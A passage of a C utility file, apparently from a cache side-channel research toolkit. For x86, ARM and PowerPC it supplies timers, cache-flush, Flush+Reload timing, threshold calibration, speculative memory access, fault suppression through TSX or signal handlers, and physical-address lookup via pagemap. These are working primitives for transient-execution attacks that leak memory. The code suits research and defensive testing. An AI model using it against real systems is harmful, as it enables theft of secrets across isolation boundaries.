163 | void flush(void *p) { asm volatile("clflush 0(%0)\n" : : "c"(p)); }
164 | 
165 | // ---------------------------------------------------------------------------
166 | void maccess(void *p) { asm volatile("mov (%0), %%eax\n" : : "c"(p) : "eax"); }
167 | 
168 | // ---------------------------------------------------------------------------
169 | void mfence() { asm volatile("mfence"); }
170 | 
171 | // ---------------------------------------------------------------------------
172 | void nospec() { asm volatile("lfence"); }
173 | 
174 | #include <cpuid.h>
175 | // ---------------------------------------------------------------------------
176 | int has_tsx() {
177 |   if (__get_cpuid_max(0, NULL) >= 7) {
178 |     unsigned a, b, c, d;
179 |     __cpuid_count(7, 0, a, b, c, d);
180 |     return (b & (1 << 11)) ? 1 : 0;
181 |   } else {
182 |     return 0;
183 |   }
184 | }
185 | 
186 | #elif defined(__aarch64__)
187 | #if ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
188 | #include <time.h>
189 | #endif
190 | 
191 | // ---------------------------------------------------------------------------
192 | uint64_t rdtsc() {
193 | #if ARM_CLOCK_SOURCE == ARM_PERF
194 |   long long result = 0;
195 | 
196 |   asm volatile("DSB SY");
197 |   asm volatile("ISB");
198 | 
199 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
200 |     return 0;
201 |   }
202 | 
203 |   asm volatile("ISB");
204 |   asm volatile("DSB SY");
205 | 
206 |   return result;
207 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
208 |   asm volatile("DSB SY");
209 |   asm volatile("ISB");
210 |   struct timespec t1;
211 |   clock_gettime(CLOCK_MONOTONIC, &t1);
212 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
213 |   asm volatile("ISB");
214 |   asm volatile("DSB SY");
215 |   return res;
216 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
217 |   uint64_t result = 0;
218 | 
219 |   asm volatile("DSB SY");
220 |   asm volatile("ISB");
221 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
222 |   asm volatile("DSB SY");
223 |   asm volatile("ISB");
224 | 
225 |   return result;
226 | #else
227 | #error Clock source not supported
228 | #endif
229 | }
230 | // ---------------------------------------------------------------------------
231 | uint64_t rdtsc_begin() {
232 | #if ARM_CLOCK_SOURCE == ARM_PERF
233 |   long long result = 0;
234 | 
235 |   asm volatile("DSB SY");
236 |   asm volatile("ISB");
237 | 
238 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
239 |     return 0;
240 |   }
241 | 
242 |   asm volatile("DSB SY");
243 | 
244 |   return result;
245 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
246 |   asm volatile("DSB SY");
247 |   asm volatile("ISB");
248 |   struct timespec t1;
249 |   clock_gettime(CLOCK_MONOTONIC, &t1);
250 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
251 |   asm volatile("DSB SY");
252 |   return res;
253 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
254 |   uint64_t result = 0;
255 | 
256 |   asm volatile("DSB SY");
257 |   asm volatile("ISB");
258 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
259 |   asm volatile("ISB");
260 | 
261 |   return result;
262 | #else
263 | #error Clock source not supported
264 | #endif
265 | }
266 | 
267 | 
268 | // ---------------------------------------------------------------------------
269 | uint64_t rdtsc_end() {
270 | #if ARM_CLOCK_SOURCE == ARM_PERF
271 |   long long result = 0;
272 | 
273 |   asm volatile("DSB SY");
274 | 
275 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
276 |     return 0;
277 |   }
278 | 
279 |   asm volatile("ISB");
280 |   asm volatile("DSB SY");
281 | 
282 |   return result;
283 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
284 |   asm volatile("DSB SY");
285 |   struct timespec t1;
286 |   clock_gettime(CLOCK_MONOTONIC, &t1);
287 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
288 |   asm volatile("ISB");
289 |   asm volatile("DSB SY");
290 |   return res;
291 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
292 |   uint64_t result = 0;
293 | 
294 |   asm volatile("DSB SY");
295 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
296 |   asm volatile("DSB SY");
297 |   asm volatile("ISB");
298 | 
299 |   return result;
300 | #else
301 | #error Clock source not supported
302 | #endif
303 | }
304 | 
305 | // ---------------------------------------------------------------------------
306 | void flush(void *p) {
307 |   asm volatile("DC CIVAC, %0" ::"r"(p));
308 |   asm volatile("DSB ISH");
309 |   asm volatile("ISB");
310 | }
311 | 
312 | // ---------------------------------------------------------------------------
313 | void maccess(void *p) {
314 |   volatile uint32_t value;
315 |   asm volatile("LDR %0, [%1]\n\t" : "=r"(value) : "r"(p));
316 |   asm volatile("DSB ISH");
317 |   asm volatile("ISB");
318 | }
319 | 
320 | // ---------------------------------------------------------------------------
321 | void mfence() { asm volatile("DSB ISH"); }
322 | 
323 | // ---------------------------------------------------------------------------
324 | void nospec() { asm volatile("DSB SY\nISB"); }
325 | 
326 | #elif defined(__PPC64__)
327 | #include <sys/platform/ppc.h>
328 | uint64_t rdtsc() {
329 |   uint64_t time;
330 |   asm volatile ("mfspr %0, 268\n\t"
331 |                 "lwsync\n\t" : "=r" (time));
332 | 
333 |   return time;
334 | }
335 | 
336 | // ---------------------------------------------------------------------------
337 | uint64_t rdtsc_begin() {
338 |   uint64_t time;
339 |   asm volatile ("mfspr %0, 268\n\t"
340 |                 "lwsync\n\t" : "=r" (time));
341 | 
342 |   return time;
343 | }
344 | 
345 | // ---------------------------------------------------------------------------
346 | uint64_t rdtsc_end() {
347 |   uint64_t time;
348 |   asm volatile ("mfspr %0, 268\n\t"
349 |                 "lwsync\n\t" : "=r" (time));
350 | 
351 |   return time;
352 | }
353 | 
354 | // ---------------------------------------------------------------------------
355 | void flush(void *p) { asm volatile( "dcbf 0, %0\n\t"
356 | 				    "dcs\n\t"
357 | 				    "ics\n\t"
358 | 				    :  : "r"(p) : ); }
359 | 
360 | // ---------------------------------------------------------------------------
361 | void maccess(void *p) { asm volatile( "ld %%r0, 0(%0)" ::"r"(p): "r0"); }
362 | 
363 | // ---------------------------------------------------------------------------
364 | void mfence() { asm volatile( "lwsync" ); }
365 | 
366 | // ---------------------------------------------------------------------------
367 | void nospec() { asm volatile( "hwsync" ); }
368 | #endif
369 | 
370 | // ---------------------------------------------------------------------------
371 | int flush_reload(void *ptr) {
372 | #if defined(__i386__)
373 |   uint32_t start = 0, end = 0;
374 | #else
375 |   uint64_t start = 0, end = 0;
376 | #endif
377 | 
378 | #if USE_RDTSC_BEGIN_END
379 |   start = rdtsc_begin();
380 | #else
381 |   start = rdtsc();
382 | #endif
383 |   maccess(ptr);
384 | #if USE_RDTSC_BEGIN_END
385 |   end = rdtsc_end();
386 | #else
387 |   end = rdtsc();
388 | #endif
389 | 
390 |   mfence();
391 | 
392 |   flush(ptr);
393 | 
394 |   if (end - start < CACHE_MISS) {
395 |     return 1;
396 |   }
397 |   return 0;
398 | }
399 | 
400 | // ---------------------------------------------------------------------------
401 | int flush_reload_t(void *ptr) {
402 | #if defined(__i386__)
403 |   uint32_t start = 0, end = 0;
404 | #else
405 |   uint64_t start = 0, end = 0;
406 | #endif
407 | 
408 | #if USE_RDTSC_BEGIN_END
409 |   start = rdtsc_begin();
410 | #else
411 |   start = rdtsc();
412 | #endif
413 |   maccess(ptr);
414 | #if USE_RDTSC_BEGIN_END
415 |   end = rdtsc_end();
416 | #else
417 |   end = rdtsc();
418 | #endif
419 | 
420 |   mfence();
421 | 
422 |   flush(ptr);
423 | 
424 |   return (int)(end - start);
425 | }
426 | 
427 | // ---------------------------------------------------------------------------
428 | int reload_t(void *ptr) {
429 | #if defined(__i386__)
430 |   uint32_t start = 0, end = 0;
431 | #else
432 |   uint64_t start = 0, end = 0;
433 | #endif
434 | 
435 | #if USE_RDTSC_BEGIN_END
436 |   start = rdtsc_begin();
437 | #else
438 |   start = rdtsc();
439 | #endif
440 |   maccess(ptr);
441 | #if USE_RDTSC_BEGIN_END
442 |   end = rdtsc_end();
443 | #else
444 |   end = rdtsc();
445 | #endif
446 | 
447 |   mfence();
448 | 
449 |   return (int)(end - start);
450 | }
451 | 
452 | 
453 | // ---------------------------------------------------------------------------
454 | size_t detect_flush_reload_threshold() {
455 |   size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
456 |   size_t dummy[16];
457 |   size_t *ptr = dummy + 8;
458 | #if defined(__i386__)
459 |   uint32_t start = 0, end = 0;
460 | #else
461 |   uint64_t start = 0, end = 0;
462 | #endif
463 | 
464 |   maccess(ptr);
465 |   for (i = 0; i < count; i++) {
466 |     reload_time += reload_t(ptr);
467 |   }
468 |   for (i = 0; i < count; i++) {
469 |     flush_reload_time += flush_reload_t(ptr);
470 |   }
471 |   reload_time /= count;
472 |   flush_reload_time /= count;
473 | 
474 |   return (flush_reload_time + reload_time * 2) / 3;
475 | }
476 | 
477 | // ---------------------------------------------------------------------------
478 | void maccess_speculative(void* ptr) {
479 |     int i;
480 |     size_t dummy = 0;
481 |     void* addr;
482 | 
483 |     for(i = 0; i < 50; i++) {
484 |         size_t c = ((i * 167) + 13) & 1;
485 |         addr = (void*)(((size_t)&dummy) * c + ((size_t)ptr) * (1 - c));
486 |         flush(&c);
487 |         mfence();
488 |         if(c / 0.5 > 1.1) maccess(addr);
489 |     }
490 | }
491 | 
492 | // ---------------------------------------------------------------------------
493 | static jmp_buf trycatch_buf;
494 | 
495 | // ---------------------------------------------------------------------------
496 | void unblock_signal(int signum __attribute__((__unused__))) {
497 |   sigset_t sigs;
498 |   sigemptyset(&sigs);
499 |   sigaddset(&sigs, signum);
500 |   sigprocmask(SIG_UNBLOCK, &sigs, NULL);
501 | }
502 | 
503 | // ---------------------------------------------------------------------------
504 | void trycatch_segfault_handler(int signum) {
505 |   (void)signum;
506 |   
507 |   int i;
508 |   for(i = 1; i < 32; i++) {
509 |     unblock_signal(i);
510 |   }
511 |   longjmp(trycatch_buf, 1);
512 | }
513 | 
514 | // ---------------------------------------------------------------------------
515 | int try_start() {
516 | #if defined(__i386__) || defined(__x86_64__)
517 |     if(has_tsx()) {
518 |         unsigned status;
519 |         // tsx begin
520 |         asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00"
521 |                  : "=a"(status)
522 |                  : "a"(-1UL)
523 |                  : "memory");
524 |         return status == (~0u);
525 |     } else 
526 | #endif
527 |     {
528 |         int i;
529 |         for(i = 1; i < 32; i++) {
530 |             signal(i, trycatch_segfault_handler); 
531 |         }
532 |         return !setjmp(trycatch_buf);
533 |     }
534 | }
535 | 
536 | // ---------------------------------------------------------------------------
537 | void try_end() {
538 | #if defined(__i386__) || defined(__x86_64__)
539 |     if(!has_tsx()) 
540 | #endif
541 |     {
542 |         int i;
543 |         for(i = 1; i < 32; i++) {
544 |             signal(i, SIG_DFL); 
545 |         }
546 |     }
547 | }
548 | 
549 | // ---------------------------------------------------------------------------
550 | void try_abort() {
551 | #if defined(__i386__) || defined(__x86_64__)
552 |     if(has_tsx()) {
553 |         asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
554 |     } else 
555 | #endif
556 |     {
557 |         maccess(0);
558 |     }
559 | }
560 | 
561 | #endif
562 | 
563 | 
564 | size_t get_physical_address(size_t vaddr) {
565 |     int fd = open("/proc/self/pagemap", O_RDONLY);
566 |     uint64_t virtual_addr = (uint64_t)vaddr;
567 |     size_t value = 0;
568 |     off_t offset = (virtual_addr / 4096) * sizeof(value);
569 |     int got = pread(fd, &value, sizeof(value), offset);
570 |     close(fd);
571 |     return (value << 12) | ((size_t)vaddr & 0xFFFULL);
572 | }
573 | 
574 | 


--------------------------------------------------------------------------------